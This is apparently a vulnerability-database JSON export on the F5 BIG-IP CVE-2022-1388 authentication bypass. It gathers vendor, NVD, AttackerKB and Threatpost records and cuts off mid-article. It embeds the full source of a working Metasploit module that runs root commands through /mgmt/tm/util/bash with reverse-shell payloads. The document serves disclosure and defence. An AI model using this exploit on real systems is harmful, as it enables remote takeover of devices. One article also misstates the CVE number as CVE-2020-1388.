16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T13:13:00", "type": "f5", "title": "Overview of F5 vulnerabilities (May 2022)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-1389", "CVE-2022-1468", "CVE-2022-25946", "CVE-2022-25990", "CVE-2022-26071", "CVE-2022-26130", "CVE-2022-26340", "CVE-2022-26370", "CVE-2022-26372", "CVE-2022-26415", "CVE-2022-26517", "CVE-2022-26835", "CVE-2022-26890", "CVE-2022-27181", "CVE-2022-27182", "CVE-2022-27189", "CVE-2022-27230", "CVE-2022-27495", "CVE-2022-27634", "CVE-2022-27636", "CVE-2022-27659", "CVE-2022-27662", "CVE-2022-27806", "CVE-2022-27875", "CVE-2022-27878", "CVE-2022-27880", "CVE-2022-28691", "CVE-2022-28695", "CVE-2022-28701", "CVE-2022-28705", "CVE-2022-28706", "CVE-2022-28707", "CVE-2022-28708", "CVE-2022-28714", "CVE-2022-28716", "CVE-2022-28859", "CVE-2022-29263", "CVE-2022-29473", "CVE-2022-29474", "CVE-2022-29479", "CVE-2022-29480", "CVE-2022-29491"], "modified": "2022-05-04T13:13:00", "id": "F5:K55879220", "href": "https://support.f5.com/csp/article/K55879220", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-06-03T22:56:47", "description": "On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated\n\n \n**Recent assessments:** \n \n**rbowes-r7** at May 10, 2022 9:02pm UTC reported:\n\nThe patch was difficult to analyze, due to the sheer amount of code and changes. But once Horizon3 released a PoC, tracking down the root cause and analyzing what\u2019s going on was much easier. Cheers!\n\n**carlosevieira** at May 05, 2022 8:36pm UTC reported:\n\nThe patch was difficult to analyze, due to the sheer amount of code and changes. But once Horizon3 released a PoC, tracking down the root cause and analyzing what\u2019s going on was much easier. Cheers!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T00:00:00", "type": "attackerkb", "title": "CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T00:00:00", "id": "AKB:84F3B5A8-D839-4F1A-9130-A0C5D4B74057", "href": "https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-05-13T00:01:49", "description": "On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T17:15:00", "type": "cve", "title": "CVE-2022-1388", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T18:16:00", "cpe": ["cpe:/a:f5:big-ip_advanced_firewall_manager:12.1.6", "cpe:/a:f5:big-ip_access_policy_manager:11.6.5", "cpe:/a:f5:big-ip_fraud_protection_service:11.6.5", "cpe:/a:f5:big-ip_local_traffic_manager:11.6.5", "cpe:/a:f5:big-ip_access_policy_manager:12.1.6", "cpe:/a:f5:big-ip_analytics:12.1.6", "cpe:/a:f5:big-ip_application_acceleration_manager:12.1.6", "cpe:/a:f5:big-ip_link_controller:12.1.6", "cpe:/a:f5:big-ip_application_security_manager:12.1.6", "cpe:/a:f5:big-ip_link_controller:11.6.5", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.6.5", "cpe:/a:f5:big-ip_application_security_manager:11.6.5", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.1.6", "cpe:/a:f5:big-ip_domain_name_system:11.6.5", "cpe:/a:f5:big-ip_global_traffic_manager:12.1.6", "cpe:/a:f5:big-ip_analytics:11.6.5", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.6.5", "cpe:/a:f5:big-ip_global_traffic_manager:11.6.5", "cpe:/a:f5:big-ip_domain_name_system:12.1.6", "cpe:/a:f5:big-ip_application_acceleration_manager:11.6.5", "cpe:/a:f5:big-ip_fraud_protection_service:12.1.6", "cpe:/a:f5:big-ip_local_traffic_manager:12.1.6"], "id": "CVE-2022-1388", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:f5:big-ip_application_security_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.6.5:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2022-06-24T08:36:36", "description": "This module exploits an authentication bypass vulnerability in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint. Successful exploitation results in remote code execution as the root user.\n", "cvss3": {}, "published": "2022-05-11T21:43:00", "type": "metasploit", "title": "F5 BIG-IP iControl RCE via REST Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-11T21:43:37", "id": "MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/f5_icontrol_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 BIG-IP iControl RCE via REST Authentication Bypass',\n 'Description' => %q{\n This module exploits an authentication bypass vulnerability\n in the F5 BIG-IP iControl REST service to gain access to the\n admin account, which is capable of executing commands\n through the /mgmt/tm/util/bash endpoint.\n\n Successful exploitation results in remote code execution\n as the root user.\n },\n 'Author' => [\n 'Heyder Andrade', # Metasploit module\n 'alt3kx <alt3kx[at]protonmail.com>', # PoC\n 'James Horseman', # Technical Writeup\n 'Ron Bowes' # Documentation of exploitation specifics\n ],\n 'References' => [\n ['CVE', '2022-1388'],\n ['URL', 'https://support.f5.com/csp/article/K23605346'],\n ['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/'], # Writeup\n ['URL', 'https://github.com/alt3kx/CVE-2022-1388_PoC'] # PoC\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-05-04', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1, # Linux Dropper avoids some timeout issues that Unix Command payloads sometimes encounter.\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.\n 'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session\n 'SideEffects' => [\n IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),\n OptString.new('HttpUsername', [true, 'iControl username', 'admin']),\n OptString.new('HttpPassword', [true, 'iControl password', ''])\n ]\n )\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n end\n\n def check\n print_status(\"Checking #{datastore['RHOST']}:#{datastore['RPORT']}\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),\n 'method' => 'GET'\n })\n\n return CheckCode::Unknown unless res&.code == 401\n\n body = res.get_json_document\n\n return CheckCode::Safe unless body.key?('message') && body['kind'] == ':resterrorresponse'\n\n signature = Rex::Text.rand_text_alpha(13)\n stub = \"echo #{signature}\"\n res = send_command(stub)\n return CheckCode::Safe unless res&.code == 200\n\n body = res.get_json_document\n\n return CheckCode::Safe unless body['kind'] == 'tm:util:bash:runstate'\n\n return CheckCode::Vulnerable if body['commandResult'].chomp == signature\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_command(cmd)\n unless res\n print_warning('Command execution timed out')\n return\n end\n\n json = res.get_json_document\n\n unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'\n fail_with(Failure::PayloadFailed, 'Failed to execute command')\n end\n\n print_good('Successfully executed command')\n\n return unless (cmd_result = json['commandResult'])\n\n vprint_line(cmd_result)\n end\n\n def send_command(cmd)\n bash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\"\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),\n 'ctype' => 'application/json',\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'headers' => {\n 'Host' => 'localhost',\n 'Connection' => 'keep-alive, X-F5-Auth-Token',\n 'X-F5-Auth-Token' => Rex::Text.rand_text_alpha_lower(6)\n },\n 'data' => {\n 'command' => 'run',\n 'utilCmdArgs' => \"-c '#{bash_cmd}'\"\n }.to_json\n }, datastore['CmdExecTimeout'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2022-05-06T22:45:06", "description": "Application service provider F5 is warning a critical vulnerability allows unauthenticated hackers with network access to execute arbitrary commands on its BIG-IP systems.\n\nThe F5 BIG-IP is a [combination of software and hardware](<https://community.f5.com/t5/technical-articles/what-is-big-ip/ta-p/279398#:~:text=F5's%20BIG%2DIP%20is%20a,delivery%20controller%20and%20security%20products.>) that is designed around access control, application availability and security solutions.\n\n[According to F5](<https://support.f5.com/csp/article/K23605346>), the flaw resides in the representational state transfer (REST) interface for the iControl framework which is used to communicate between the F5 devices and users.\n\nThreat actors can send undisclosed requests and leverage the flaw to bypass the iControl REST authentication and access the F5 BIG-IP systems, an attacker can execute arbitrary commands, create or delete files or disable servers.\n\n\u201cThis vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services,\u201d said F5 in an advisory. \u201cThere is no data plane exposure; this is a control plane issue only,\u201d they added.\n\nA self-IP address is an IP address on a BIG-IP system, that a customer uses to associate with VLAN.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert ](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/04/f5-releases-security-advisories-addressing-multiple>)and advised users to apply the required updates.\n\n## **Affected Versions**\n\nThe security vulnerability that affects the BIG-IP product version are:\n\n * 1.0 to 16.1.2\n * 1.0 to 15.1.5\n * 1.0 to 14.1.4\n * 1.0 to 13.1.4\n * 1.0 to 12.1.6\n * 6.1 to 11.6.5\n\nThe F5 will not introduce fixes for versions 11.x (11.6.1 \u2013 11.6.5) and 12.x (12.1.0 \u2013 12.1.6).\n\nThe patches for versions v17.0.0, v16.1.2.2, v15.1.5.1, v14.1.4.6, and v13.1.5 were introduced by F5.\n\nThe advisory by F5 clarifies that the CVE-2022-1388 has no effect on other F5 products \u2013 BIG-IQ Centralized Management, F5OS-A, F5OS-C, or Traffic SDC.\n\n\n\nF5 affected products and fixed versions (Source: F5)\n\nThe BIG-IP devices are commonly integrated into the enterprises there is a significant threat of widespread attack.\n\nSecurity researcher Nate Warfield reported in a [tweet](<https://twitter.com/n0x08/status/1521921249596768256?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1521921249596768256%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Ff5-warns-of-critical-big-ip-rce-bug-allowing-device-takeover%2F>) that nearly 16,000 BIG-IP devices are exposed to the internet. A query shared by Warfield shows the exposed devices on [Shodan](<https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22>).\n\nMost of the exposed BIG-IP devices are located in the USA, China, India, and Australia. These systems are allocated to Microsoft corporation, Google LLC, DigitalOcean, and Linode.\n\n## **Mitigations**\n\nThree \u201ctemporary mitigation\u201d methods were advised by F5, for those who can\u2019t deploy security patches immediately.\n\nAccording to F5 \u201cYou can[ block all access to the iControl REST interface](<https://support.f5.com/csp/article/K23605346#proc1>) of your BIG-IP system through self IP addresses\u201d. This can be done by changing the Port Lockdown settings to Allow None for each self-IP address in the system.\n\nAnother mitigation method is to[ restrict iControl REST access](<https://support.f5.com/csp/article/K23605346#proc2>) through the management interface or modify the [BIG-IP httpd configuration](<https://support.f5.com/csp/article/K23605346#proc3>).\n\nAdditionally, F5 has also released a more [generic advisory](<https://support.f5.com/csp/article/K55879220>) to tackle another set of 17 high severity vulnerabilities discovered and fixed in BIG-IP.\n\nIn July 2020, a [critical RCE bug](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>) left thousands of F5 BIG-IP users\u2019 accounts vulnerable to an attacker.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T12:48:08", "type": "threatpost", "title": "F5 Warns of Critical Bug Allowing Remote Code Execution in BIG-IP Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-05T12:48:08", "id": "THREATPOST:3118E6C785806679DF205606435B79C7", "href": "https://threatpost.com/f5-critical-bugbig-ip-systems/179514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-10T14:33:54", "description": "Threat actors have started exploiting a critical bug in the application service provider F5\u2019s BIG-IP modules after a working exploit of the vulnerability was publicly made available.\n\nThe critical vulnerability, tracked as [CVE-2020-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388>), allows unauthenticated attackers to launch \u201carbitrary system commands, create or delete files, or disable services\u201d on its BIG-IP systems.\n\nThose [patches and mitigation methods](<https://support.f5.com/csp/article/K23605346>), released by F5, mitigate vulnerable BIG-IP iControl modules tied to the representational state transfer (REST) authentication component. If left unpatched, a hacker can exploit weaknesses to execute commands with root system privileges.\n\n\u201cThis issue allows attackers with access to the management interface to basically pretend to be an administrator due to a flaw in how the authentication is implemented,\u201d said Aaron Portnoy, director of research and development, Randori.\n\n\u201cOnce you are an admin, you can interact with all the endpoints the application provides, including execute code\u201d Portnoy added.\n\nA shodan query shared by security researcher [Jacob Baines](<https://twitter.com/Junior_Baines/status/1522205355287228416>) revealed thousands of exposed BIG-IP systems on the internet, which an attacker can leverage to exploit remotely.\n\n## **Actively Exploited **\n\nIn the past 24 hours, security researchers announced that they had created the working exploit of the vulnerability, and images related to [proof-of-exploit code](<https://twitter.com/AnnaViolet20/status/1523564632140509184?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1523564632140509184%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Farstechnica.com%2Finformation-technology%2F2022%2F05%2Fhackers-are-actively-exploiting-big-ip-vulnerability-with-a-9-8-severity-rating%2F>) for CVE-2020-1388 started flooding [Twitter](<https://twitter.com/search?q=CVE-2022-1388&src=typed_query&f=top>).\n\nThe exploits are publicly available, and security researchers show how hackers can use the exploit by sending just two commands and some headers to target and access an F5 application endpoint named \u201cbash\u201d which is exposed to the internet.\n\nThe function of this endpoint is to provide an interface for running user-supplied input as a bash command with root privileges.\n\nGerm\u00e1n Fern\u00e1ndez, a security researcher at Cronup, [revealed that hackers are dropping PHP webshells](<https://twitter.com/1ZRR4H/status/1523572874061422593>) to \u201c/tmp/f5.sh\u201d and installing them to \u201c/usr/local/www/xui/common/css/\u201d. Attacks show the threat actors using the addresses 216[.]162.206[.]213 and 209[.]127.252[.]207 for dropping the payload. The payload is executed and removed from the system after installation.\n\nThe exploit can also work when [no password is supplied](<https://twitter.com/wdormann/status/1523713803602788352>), as disclosed by Will Dormann, vulnerability analyst at the CERT/CC.\n\nSome of the exploitation attempts did not target the management interface as observed by [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1523223763747483648>), he added that \u201cIf you configured F5 box as a load balancer and firewall via self IP it is also vulnerable so this may get messy.\u201d\n\nThe easiness of the exploit and the common term for the vulnerable endpoint \u2018bash\u2019 which is a popular Linux shell raises suspicion among security researchers as they believe it did not end up in the product by mistake.\n\n\u201cThe CVE-2022-1388 vulnerability is surely an honest mistake by an F5 developer, right?\u201d added researcher [Will Doorman](<https://twitter.com/wdormann/status/1523638101796564993>).\n\n\u201cI\u2019m not entirely unconvinced that this code wasn\u2019t planted by a developer performing corporate espionage for an incident response firm as some sort of revenue guarantee scheme,\u201d said Jake Williams, a vulnerability analyst at the CERT/CC in a [tweet](<https://twitter.com/malwarejake/status/1523634017178124288>).\n\n## **Apply Patches Immediately**\n\nAdministrators are advised to strictly follow the guidelines and install the available patches immediately, as well as remove access to the management interface over the public internet.\n\n * [Block all access to the iControl REST interface](<https://support.f5.com/csp/article/K23605346#proc1>)\n * [Restrict iControl REST access](<https://support.f5.com/csp/article/K23605346#proc2>)\n * [Modify BIG-IP httpd configuration](<https://support.f5.com/csp/article/K23605346#proc3>)\n\nThe [detailed advisory](<https://support.f5.com/csp/article/K23605346>) is released by F5 with all the patches and mitigations, the researcher at Randori attack surface management released the [Bash code](<https://www.randori.com/blog/vulnerability-analysis-cve-2022-1388/>) that helps to determine whether an instance is exploitable to CVE-2020-1388 or not.\n\n\n\nReported By: Sagar Tiwari, an independent security researcher and technical writer.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T12:35:15", "type": "threatpost", "title": "Hackers Actively Exploit F5 BIG-IP Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1388", "CVE-2022-1388"], "modified": "2022-05-10T12:35:15", "id": "THREATPOST:547711F4B3BD7FF6F94D605387B3DD50", "href": "https://threatpost.com/exploit-f5-big-ip-bug/179563/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T12:26:24", "description": "A rapidly evolving IoT malware dubbed \u201cEnemyBot\u201d is targeting content management systems (CMS), web servers and Android devices. Threat actor group \u201cKeksec\u201d is believed behind the distribution of the malware, according to researchers.\n\n\u201cServices such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices,\u201d reported [AT&amp;T Alien labs](<https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers>) in a recent post. \u201cThe malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,\u201d they added.\n\n## **EnemyBot Working**\n\nThe Alien lab research team study found four main sections of the malware.\n\nThe first section is a python script \u2018cc7.py\u2019, used to download all dependencies and compile the malware into different OS architectures (x86, ARM, macOS, OpenBSD, PowerPC, MIPS). After compilation, a batch file \u201cupdate.sh\u201d is created and used to spread the malware to vulnerable targets.\n\nThe second section is the main botnet source code, which includes all the other functionality of the malware excluding the main part and incorporates source codes of the various botnets that can combine to perform an attack.\n\nThe third module is obfuscation segment \u201chide.c\u201d and is compiled and executed manually to encode /decode the malware strings. A simple swap table is used to hide strings and \u201ceach char is replaced with a corresponding char in the table\u201d according to researchers.\n\nThe last segment includes a command-and-control (CC) component to receive vital actions and payloads from attackers.\n\nAT&amp;T researcher\u2019s further analysis revealed a new scanner function to hunt vulnerable IP addresses and an \u201cadb_infect\u201d function that is used to attack Android devices.\n\nADB or Android Debug Bridge is a command-line tool that allows you to communicate with a device.\n\n\u201cIn case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing shell command,\u201d said the researcher.\n\n\u201cKeksec\u2019s EnemyBot appears to be just starting to spread, however due to the authors\u2019 rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,\u201d the researchers added.\n\nThis Linux-based botnet EnemyBot was first discovered by [Securonix ](<https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/>)in March 2022, and later in-depth analysis was done by [Fortinet](<https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/>).\n\n## **Vulnerabilities Currently Exploited by EnemyBot**\n\nThe AT&amp;T researchers release a list of vulnerabilities that are currently exploited by the Enemybot, some of them are not assigned a CVE yet.\n\nThe list includes [Log4shell vulnerability ](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>)([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)), [F5 BIG IP](<https://threatpost.com/exploit-f5-big-ip-bug/179563/>) devices ([CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388>)), and others. Some of the vulnerabilities were not assigned a CVE yet such as PHP Scriptcase and Adobe ColdFusion 11.\n\n * [Log4shell](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) vulnerability \u2013 [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)\n * [F5 BIG IP](<https://threatpost.com/exploit-f5-big-ip-bug/179563/>) devices 